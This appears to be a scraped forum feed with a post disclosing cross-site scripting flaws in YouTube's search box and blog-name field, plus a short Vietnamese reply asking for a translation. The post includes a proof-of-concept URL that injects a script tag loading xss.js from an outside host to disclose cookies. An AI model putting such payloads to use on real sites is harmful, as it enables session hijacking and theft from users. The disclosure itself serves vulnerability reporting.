<![CDATA[Latest posts for the topic "Youtube.com - XSS & cookie disclosure"]]> /hvaonline/posts/list/13.html JForum - http://www.jforum.net Youtube.com - XSS & cookie disclosure http://www.youtube.com Affected files: * Search box input * Adding a new blog: - Blog name XSS Vuln with cookie disclosure via search box: Data isn't sanatized when using the search box. For PoC input: PoC link: +http://www.youtube.com/results?search=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fyoufucktard.com%2Fxss.js%3E%3C%2FSCRIPT%3E&search_type=search_videos&search=Search Screenshots: http://www.youfucktard.com/xsp/youtube1.jpg XSS vuln via blog name input box: Now, you tube allows you to add a blog to your profile, and one of the places they let you merge a blog is from blogspot.com. I auditing them a few days ago, and since you can use html in your blogs name amongst other things, this is dangerous for bringing it into youtube. Screenshots: http://www.youfucktard.com/xsp/youtube1.jpg http://www.youfucktard.com/xsp/youtube2.jpg http://www.youfucktard.com/xsp/youtube3.jpg ]]> /hvaonline/posts/list/113.html#436 /hvaonline/posts/list/113.html#436 GMT Re: Youtube.com - XSS & cookie disclosure Có lẽ Bro nên chịu khó Tran ra tiếng Việt cho anh em nào kô biết TA còn có cơ hội học hỏi.]]> /hvaonline/posts/list/113.html#10761 /hvaonline/posts/list/113.html#10761 GMT Youtube.com - XSS & cookie disclosure /hvaonline/posts/list/113.html#10917 /hvaonline/posts/list/113.html#10917 GMT Youtube.com - XSS & cookie disclosure /hvaonline/posts/list/113.html#11722 /hvaonline/posts/list/113.html#11722 GMT